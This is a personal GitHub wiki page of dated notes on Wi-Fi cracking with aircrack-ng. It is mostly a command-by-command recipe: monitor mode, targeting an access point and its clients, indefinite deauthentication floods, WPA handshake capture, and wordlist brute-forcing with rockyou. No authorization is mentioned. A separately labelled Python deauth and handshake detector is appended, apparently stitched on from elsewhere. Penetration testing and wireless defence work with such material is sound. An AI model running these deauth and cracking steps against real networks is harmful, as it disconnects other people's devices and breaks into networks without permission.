aircrack-ng - kdaisho/Blog GitHub Wiki

May 17, 2025

5GHz is killable!

Using a Yagi antenna, I successfully deauthed a Samsung Galaxy A54 (phone). Maybe it's just distance. And the capture file was also successfully brute-forced (although I know the pw). But I also took one more down with a full handshake (4 of 4).


May 6, 2025

Deauth attack is ineffective against 5 GHz connections?

https://forum.aircrack-ng.org/index.php?topic=9638.0

In the thread, someone says:

Make sure your AP is set to 802.11ac (and not 11ax).

My WiFi adapter (Panda PAU09) supports 802.11n, not 802.11ac.

Should I try the ALFA AWUS036ACH soon?

Maybe not. At the end of the thread they report no success even with the AWUS036ACH. 5 GHz is just invincible.

May 4, 2025

Don't try the 5 GHz band. 5 GHz is unbreakable IMO. Let's focus on 2.4 GHz for now. You don't see many, but you can definitely find a few even today (as of May 2025).

Here are the steps:

  1. Check the network interface names:
     iwconfig
     • lo: loopback interface, used by the system to communicate with itself
     • wlan0 (or wlp0s20fe, or whatever): wireless network interface (Wi-Fi)
  2. Set the wireless network interface to monitor mode:
     sudo airmon-ng start wlan0
  3. List available 2.4 GHz networks (--band bg for 2.4 GHz, --band a for 5 GHz):
     sudo airodump-ng wlan0mon --band bg
  4. Narrow down to one channel if you see an AP with more connections than the others. Make sure its Data column has a value well above 0. Look at PWR: the higher the value (closer to zero), the stronger the signal (note: the values are negative on most systems).

In this example, we're pinning channel 11.

sudo airodump-ng -c 11 -w mytest -d {BSSID_OF_AP} wlan0mon

Then, if you see a STATION pop up, press the spacebar to pause the terminal output and grab the BSSID of the AP and the MAC address of the client device. Press the spacebar again to resume.

Now we're going to deauth the client device:

sudo aireplay-ng --deauth 0 -a {BSSID_OF_AP} -c {BSSID_OF_CLIENT (STATION)} wlan0mon

Leave it running for a little while.

Now verify whether you captured a handshake.

aircrack-ng mytest-01.cap

If you successfully disconnected the target from the AP, the command prints something like this:

Encryption
WPA (1 handshake)

Now open the cap file with Wireshark and filter the packet list with eapol. You should see some packets.

wireshark mytest-01.cap

Then brute-force the password:

sudo aircrack-ng mytest-01.cap -w /usr/share/wordlists/rockyou.txt

🤞🤞🤞


Troubleshoot

wlan0mon is on channel 2, but the AP uses channel 11

hint: https://forum.aircrack-ng.org/index.php?topic=2114.0

Steps

Check interfaces.

iwconfig

If you see Mode:Managed, switch it to Monitor mode.

sudo airmon-ng start wlan0

List available networks. The previous command changed the interface name from wlan0 to wlan0mon.

sudo airodump-ng wlan0mon

Choose a network BSSID from the list (e.g. BE:FB:E4:24:69:7B).

Now we want to find out which devices are currently connected to the network.

sudo airodump-ng -c 6 -w MyTest -d BE:FB:E4:24:69:7B wlan0mon
  • -c: channel
  • -w: dump filename prefix (airodump dumps several files)
  • -d: filter by the AP's MAC address (BSSID)

Note: the command above writes several files to the current directory, so choose where you run it.

At first you will probably see only the AP itself. Wait for other devices to appear under STATION.

If nothing appears under STATION, it's possible that no devices are connected to the network.

If you find one, grab its MAC address. We'll start the deauthentication.

sudo aireplay-ng --deauth 0 -a BE:FB:E4:24:69:7B -c 86:40:CB:D5:FA:30 wlan0mon
  • --deauth 0: sends deauthentication frames indefinitely; --deauth 100 sends 100 frames.
  • -a: Specifies the MAC address of the target access point.
  • -c: Specifies the MAC address of the client (optional; if omitted, all connected clients will be targeted).

If you run it without the -c flag (no client MAC address), the deauth applies to all clients.

The target device gets disconnected. Wait for the device owner to reconnect to the network.


Let's check the dump files. If a handshake occurred between the target device and the AP, it will have been captured in the cap file.

Open it with Wireshark.

wireshark MyTest-04.cap

There could be tons of data, and it won't make much sense at a glance. You can browse it, or filter the list with eapol. We'll try to extract the password from this.

  • EAPOL (Extensible Authentication Protocol over LAN) is a network protocol that lets devices authenticate when connecting to a network. It's part of the IEEE 802.1X standard and is used for access control in wired and wireless networks.

Now you need a wordlist of some sort: a text file containing popular passwords. We'll brute-force the cap file with it.

sudo aircrack-ng MyTest-04.cap -w myWordList.txt

(Boom)
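The deauth-then-handshake sequence walked through above (both in the May 4 steps and in the Troubleshoot steps) is also exactly the pattern a wireless IDS watches for. As an added example, not from this wiki or the aircrack-ng project: a small Python parser over raw 802.11 frames (radiotap header assumed already stripped) that counts deauthentication frames per AP/client pair and records which EAPOL-Key messages of the WPA 4-way handshake followed. The frames are constructed inline, reusing the page's sample MAC addresses.

```python
import struct
from collections import Counter, defaultdict

LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"  # LLC/SNAP header with EtherType 0x888E (EAPOL)
AP, CLIENT = bytes.fromhex("befbe424697b"), bytes.fromhex("8640cbd5fa30")  # constructed, from the wiki's sample MACs

def handshake_msg(key_info):
    """Map EAPOL-Key 'Key Information' bits to the 4-way message number: bit6 Install, 7 ACK, 8 MIC, 9 Secure."""
    install, ack, mic, secure = (bool(key_info & b) for b in (0x40, 0x80, 0x100, 0x200))
    return {(0, 1, 0, 0): 1, (0, 0, 1, 0): 2, (1, 1, 1, 1): 3, (0, 0, 1, 1): 4}.get((install, ack, mic, secure), 0)

def parse_frame(frame):
    """Classify one raw 802.11 frame (radiotap already stripped) as deauth, eapol or other."""
    ftype, subtype = (frame[0] >> 2) & 0x3, frame[0] >> 4
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    client = a1 if a1 != a3 else a2           # whichever address is not the BSSID is the station
    if ftype == 0 and subtype == 0x0C:        # management frame, subtype 12 = deauthentication
        return "deauth", a3, client
    if ftype == 2:                            # data frame; QoS subtypes carry an extra 2-byte field
        hdr = 24 + (2 if subtype & 0x08 else 0)
        if frame[hdr:hdr + 8] == LLC_SNAP_EAPOL and len(frame) >= hdr + 15 and frame[hdr + 9] == 3:  # type 3 = Key
            key_info = struct.unpack_from(">H", frame, hdr + 13)[0]     # follows the 1-byte descriptor type
            return "eapol", a3, client, handshake_msg(key_info)
    return ("other",)

def analyse(frames, threshold=5):
    """Alert on (BSSID, client) pairs hit by >= threshold deauths, noting which handshake messages followed."""
    deauths, msgs = Counter(), defaultdict(set)
    for f in frames:
        kind, *rest = parse_frame(f)
        if kind == "deauth":
            deauths[tuple(rest)] += 1
        elif kind == "eapol":
            msgs[tuple(rest[:2])].add(rest[2])
    return [{"bssid": b.hex(":"), "client": c.hex(":"), "deauths": n, "handshake": sorted(msgs[(b, c)])}
            for (b, c), n in deauths.items() if n >= threshold]

# Constructed sample traffic: 8 forged deauths toward the client, then a complete 4-way handshake.
def deauth(ap, client, reason=7):
    return b"\xc0\x00\x00\x00" + client + ap + ap + b"\x00\x00" + struct.pack("<H", reason)

def eapol(src, dst, bssid, key_info, from_ds):
    fc = b"\x08\x02" if from_ds else b"\x08\x01"                          # FromDS=0x02 / ToDS=0x01 flag
    a1, a2, a3 = (dst, bssid, src) if from_ds else (bssid, src, dst)
    body = b"\x02\x03\x00\x5f\x02" + struct.pack(">H", key_info) + bytes(92)  # ver 2, type Key, len 95, RSN
    return fc + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + LLC_SNAP_EAPOL + body

FRAMES = [deauth(AP, CLIENT)] * 8 + [eapol(AP, CLIENT, AP, 0x008A, True), eapol(CLIENT, AP, AP, 0x010A, False),
                                     eapol(AP, CLIENT, AP, 0x13CA, True), eapol(CLIENT, AP, AP, 0x030A, False)]
```

Running analyse(FRAMES) yields one alert for the AP/client pair with 8 deauths and handshake messages [1, 2, 3, 4]; a capture with only a few deauths and no EAPOL traffic produces no alert.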